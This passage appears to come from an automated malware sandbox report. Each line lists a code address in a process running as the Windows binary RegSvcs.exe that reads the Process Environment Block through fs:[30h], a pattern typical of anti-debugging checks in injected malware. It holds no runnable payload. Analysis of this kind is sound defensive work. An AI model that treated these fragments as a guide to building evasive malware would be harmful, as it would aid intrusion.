Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B4260 mov eax, dword ptr fs:[00000030h]	8_2_017B4260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B6259 mov eax, dword ptr fs:[00000030h]	8_2_017B6259
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018462A0 mov eax, dword ptr fs:[00000030h]	8_2_018462A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018462A0 mov ecx, dword ptr fs:[00000030h]	8_2_018462A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018462A0 mov eax, dword ptr fs:[00000030h]	8_2_018462A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018462A0 mov eax, dword ptr fs:[00000030h]	8_2_018462A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018462A0 mov eax, dword ptr fs:[00000030h]	8_2_018462A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018462A0 mov eax, dword ptr fs:[00000030h]	8_2_018462A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017AA250 mov eax, dword ptr fs:[00000030h]	8_2_017AA250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017A823B mov eax, dword ptr fs:[00000030h]	8_2_017A823B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018862D6 mov eax, dword ptr fs:[00000030h]	8_2_018862D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C02E1 mov eax, dword ptr fs:[00000030h]	8_2_017C02E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C02E1 mov eax, dword ptr fs:[00000030h]	8_2_017C02E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C02E1 mov eax, dword ptr fs:[00000030h]	8_2_017C02E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017BA2C3 mov eax, dword ptr fs:[00000030h]	8_2_017BA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017BA2C3 mov eax, dword ptr fs:[00000030h]	8_2_017BA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017BA2C3 mov eax, dword ptr fs:[00000030h]	8_2_017BA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017BA2C3 mov eax, dword ptr fs:[00000030h]	8_2_017BA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017BA2C3 mov eax, dword ptr fs:[00000030h]	8_2_017BA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01838243 mov eax, dword ptr fs:[00000030h]	8_2_01838243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01838243 mov ecx, dword ptr fs:[00000030h]	8_2_01838243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0188625D mov eax, dword ptr fs:[00000030h]	8_2_0188625D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0186A250 mov eax, dword ptr fs:[00000030h]	8_2_0186A250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0186A250 mov eax, dword ptr fs:[00000030h]	8_2_0186A250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C02A0 mov eax, dword ptr fs:[00000030h]	8_2_017C02A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C02A0 mov eax, dword ptr fs:[00000030h]	8_2_017C02A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01860274 mov eax, dword ptr fs:[00000030h]	8_2_01860274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01860274 mov eax, dword ptr fs:[00000030h]	8_2_01860274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01860274 mov eax, dword ptr fs:[00000030h]	8_2_01860274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01860274 mov eax, dword ptr fs:[00000030h]	8_2_01860274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01860274 mov eax, dword ptr fs:[00000030h]	8_2_01860274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01860274 mov eax, dword ptr fs:[00000030h]	8_2_01860274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01860274 mov eax, dword ptr fs:[00000030h]	8_2_01860274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01860274 mov eax, dword ptr fs:[00000030h]	8_2_01860274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01860274 mov eax, dword ptr fs:[00000030h]	8_2_01860274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01860274 mov eax, dword ptr fs:[00000030h]	8_2_01860274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01860274 mov eax, dword ptr fs:[00000030h]	8_2_01860274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01860274 mov eax, dword ptr fs:[00000030h]	8_2_01860274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017EE284 mov eax, dword ptr fs:[00000030h]	8_2_017EE284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017EE284 mov eax, dword ptr fs:[00000030h]	8_2_017EE284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017E656A mov eax, dword ptr fs:[00000030h]	8_2_017E656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017E656A mov eax, dword ptr fs:[00000030h]	8_2_017E656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017E656A mov eax, dword ptr fs:[00000030h]	8_2_017E656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018305A7 mov eax, dword ptr fs:[00000030h]	8_2_018305A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018305A7 mov eax, dword ptr fs:[00000030h]	8_2_018305A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018305A7 mov eax, dword ptr fs:[00000030h]	8_2_018305A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B8550 mov eax, dword ptr fs:[00000030h]	8_2_017B8550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B8550 mov eax, dword ptr fs:[00000030h]	8_2_017B8550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017DE53E mov eax, dword ptr fs:[00000030h]	8_2_017DE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017DE53E mov eax, dword ptr fs:[00000030h]	8_2_017DE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017DE53E mov eax, dword ptr fs:[00000030h]	8_2_017DE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017DE53E mov eax, dword ptr fs:[00000030h]	8_2_017DE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017DE53E mov eax, dword ptr fs:[00000030h]	8_2_017DE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C0535 mov eax, dword ptr fs:[00000030h]	8_2_017C0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C0535 mov eax, dword ptr fs:[00000030h]	8_2_017C0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C0535 mov eax, dword ptr fs:[00000030h]	8_2_017C0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C0535 mov eax, dword ptr fs:[00000030h]	8_2_017C0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C0535 mov eax, dword ptr fs:[00000030h]	8_2_017C0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C0535 mov eax, dword ptr fs:[00000030h]	8_2_017C0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01846500 mov eax, dword ptr fs:[00000030h]	8_2_01846500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01884500 mov eax, dword ptr fs:[00000030h]	8_2_01884500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01884500 mov eax, dword ptr fs:[00000030h]	8_2_01884500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01884500 mov eax, dword ptr fs:[00000030h]	8_2_01884500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01884500 mov eax, dword ptr fs:[00000030h]	8_2_01884500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01884500 mov eax, dword ptr fs:[00000030h]	8_2_01884500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01884500 mov eax, dword ptr fs:[00000030h]	8_2_01884500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01884500 mov eax, dword ptr fs:[00000030h]	8_2_01884500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017EC5ED mov eax, dword ptr fs:[00000030h]	8_2_017EC5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017EC5ED mov eax, dword ptr fs:[00000030h]	8_2_017EC5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017DE5E7 mov eax, dword ptr fs:[00000030h]	8_2_017DE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017DE5E7 mov eax, dword ptr fs:[00000030h]	8_2_017DE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017DE5E7 mov eax, dword ptr fs:[00000030h]	8_2_017DE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017DE5E7 mov eax, dword ptr fs:[00000030h]	8_2_017DE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017DE5E7 mov eax, dword ptr fs:[00000030h]	8_2_017DE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017DE5E7 mov eax, dword ptr fs:[00000030h]	8_2_017DE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017DE5E7 mov eax, dword ptr fs:[00000030h]	8_2_017DE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017DE5E7 mov eax, dword ptr fs:[00000030h]	8_2_017DE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B25E0 mov eax, dword ptr fs:[00000030h]	8_2_017B25E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B65D0 mov eax, dword ptr fs:[00000030h]	8_2_017B65D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017EA5D0 mov eax, dword ptr fs:[00000030h]	8_2_017EA5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017EA5D0 mov eax, dword ptr fs:[00000030h]	8_2_017EA5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017EE5CF mov eax, dword ptr fs:[00000030h]	8_2_017EE5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017EE5CF mov eax, dword ptr fs:[00000030h]	8_2_017EE5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017D45B1 mov eax, dword ptr fs:[00000030h]	8_2_017D45B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017D45B1 mov eax, dword ptr fs:[00000030h]	8_2_017D45B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017EE59C mov eax, dword ptr fs:[00000030h]	8_2_017EE59C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017E4588 mov eax, dword ptr fs:[00000030h]	8_2_017E4588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B2582 mov eax, dword ptr fs:[00000030h]	8_2_017B2582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B2582 mov ecx, dword ptr fs:[00000030h]	8_2_017B2582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017DA470 mov eax, dword ptr fs:[00000030h]	8_2_017DA470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017DA470 mov eax, dword ptr fs:[00000030h]	8_2_017DA470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017DA470 mov eax, dword ptr fs:[00000030h]	8_2_017DA470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0186A49A mov eax, dword ptr fs:[00000030h]	8_2_0186A49A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017A645D mov eax, dword ptr fs:[00000030h]	8_2_017A645D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017D245A mov eax, dword ptr fs:[00000030h]	8_2_017D245A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0183A4B0 mov eax, dword ptr fs:[00000030h]	8_2_0183A4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017EE443 mov eax, dword ptr fs:[00000030h]	8_2_017EE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017EE443 mov eax, dword ptr fs:[00000030h]	8_2_017EE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017EE443 mov eax, dword ptr fs:[00000030h]	8_2_017EE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017EE443 mov eax, dword ptr fs:[00000030h]	8_2_017EE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017EE443 mov eax, dword ptr fs:[00000030h]	8_2_017EE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017EE443 mov eax, dword ptr fs:[00000030h]	8_2_017EE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017EE443 mov eax, dword ptr fs:[00000030h]	8_2_017EE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017EE443 mov eax, dword ptr fs:[00000030h]	8_2_017EE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017AE420 mov eax, dword ptr fs:[00000030h]	8_2_017AE420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017AE420 mov eax, dword ptr fs:[00000030h]	8_2_017AE420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017AE420 mov eax, dword ptr fs:[00000030h]	8_2_017AE420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017AC427 mov eax, dword ptr fs:[00000030h]	8_2_017AC427
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017E8402 mov eax, dword ptr fs:[00000030h]	8_2_017E8402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017E8402 mov eax, dword ptr fs:[00000030h]	8_2_017E8402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017E8402 mov eax, dword ptr fs:[00000030h]	8_2_017E8402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B04E5 mov ecx, dword ptr fs:[00000030h]	8_2_017B04E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01836420 mov eax, dword ptr fs:[00000030h]	8_2_01836420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01836420 mov eax, dword ptr fs:[00000030h]	8_2_01836420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01836420 mov eax, dword ptr fs:[00000030h]	8_2_01836420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01836420 mov eax, dword ptr fs:[00000030h]	8_2_01836420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01836420 mov eax, dword ptr fs:[00000030h]	8_2_01836420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01836420 mov eax, dword ptr fs:[00000030h]	8_2_01836420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01836420 mov eax, dword ptr fs:[00000030h]	8_2_01836420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017E44B0 mov ecx, dword ptr fs:[00000030h]	8_2_017E44B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B64AB mov eax, dword ptr fs:[00000030h]	8_2_017B64AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0186A456 mov eax, dword ptr fs:[00000030h]	8_2_0186A456
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0183C460 mov ecx, dword ptr fs:[00000030h]	8_2_0183C460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B8770 mov eax, dword ptr fs:[00000030h]	8_2_017B8770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0185678E mov eax, dword ptr fs:[00000030h]	8_2_0185678E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C0770 mov eax, dword ptr fs:[00000030h]	8_2_017C0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C0770 mov eax, dword ptr fs:[00000030h]	8_2_017C0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C0770 mov eax, dword ptr fs:[00000030h]	8_2_017C0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C0770 mov eax, dword ptr fs:[00000030h]	8_2_017C0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C0770 mov eax, dword ptr fs:[00000030h]	8_2_017C0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C0770 mov eax, dword ptr fs:[00000030h]	8_2_017C0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C0770 mov eax, dword ptr fs:[00000030h]	8_2_017C0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C0770 mov eax, dword ptr fs:[00000030h]	8_2_017C0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C0770 mov eax, dword ptr fs:[00000030h]	8_2_017C0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C0770 mov eax, dword ptr fs:[00000030h]	8_2_017C0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C0770 mov eax, dword ptr fs:[00000030h]	8_2_017C0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C0770 mov eax, dword ptr fs:[00000030h]	8_2_017C0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018647A0 mov eax, dword ptr fs:[00000030h]	8_2_018647A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B0750 mov eax, dword ptr fs:[00000030h]	8_2_017B0750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F2750 mov eax, dword ptr fs:[00000030h]	8_2_017F2750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F2750 mov eax, dword ptr fs:[00000030h]	8_2_017F2750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017E674D mov esi, dword ptr fs:[00000030h]	8_2_017E674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017E674D mov eax, dword ptr fs:[00000030h]	8_2_017E674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017E674D mov eax, dword ptr fs:[00000030h]	8_2_017E674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018307C3 mov eax, dword ptr fs:[00000030h]	8_2_018307C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017E273C mov eax, dword ptr fs:[00000030h]	8_2_017E273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017E273C mov ecx, dword ptr fs:[00000030h]	8_2_017E273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017E273C mov eax, dword ptr fs:[00000030h]	8_2_017E273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017EC720 mov eax, dword ptr fs:[00000030h]	8_2_017EC720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017EC720 mov eax, dword ptr fs:[00000030h]	8_2_017EC720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0183E7E1 mov eax, dword ptr fs:[00000030h]	8_2_0183E7E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B0710 mov eax, dword ptr fs:[00000030h]	8_2_017B0710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017E0710 mov eax, dword ptr fs:[00000030h]	8_2_017E0710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017EC700 mov eax, dword ptr fs:[00000030h]	8_2_017EC700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B47FB mov eax, dword ptr fs:[00000030h]	8_2_017B47FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B47FB mov eax, dword ptr fs:[00000030h]	8_2_017B47FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017D27ED mov eax, dword ptr fs:[00000030h]	8_2_017D27ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017D27ED mov eax, dword ptr fs:[00000030h]	8_2_017D27ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017D27ED mov eax, dword ptr fs:[00000030h]	8_2_017D27ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0182C730 mov eax, dword ptr fs:[00000030h]	8_2_0182C730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017BC7C0 mov eax, dword ptr fs:[00000030h]	8_2_017BC7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B07AF mov eax, dword ptr fs:[00000030h]	8_2_017B07AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01834755 mov eax, dword ptr fs:[00000030h]	8_2_01834755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0183E75D mov eax, dword ptr fs:[00000030h]	8_2_0183E75D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017E2674 mov eax, dword ptr fs:[00000030h]	8_2_017E2674
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017EA660 mov eax, dword ptr fs:[00000030h]	8_2_017EA660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017EA660 mov eax, dword ptr fs:[00000030h]	8_2_017EA660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017CC640 mov eax, dword ptr fs:[00000030h]	8_2_017CC640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B262C mov eax, dword ptr fs:[00000030h]	8_2_017B262C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017CE627 mov eax, dword ptr fs:[00000030h]	8_2_017CE627
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017E8620 mov eax, dword ptr fs:[00000030h]	8_2_017E8620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017E6620 mov eax, dword ptr fs:[00000030h]	8_2_017E6620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F2619 mov eax, dword ptr fs:[00000030h]	8_2_017F2619
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0182E6F2 mov eax, dword ptr fs:[00000030h]	8_2_0182E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0182E6F2 mov eax, dword ptr fs:[00000030h]	8_2_0182E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0182E6F2 mov eax, dword ptr fs:[00000030h]	8_2_0182E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0182E6F2 mov eax, dword ptr fs:[00000030h]	8_2_0182E6F2
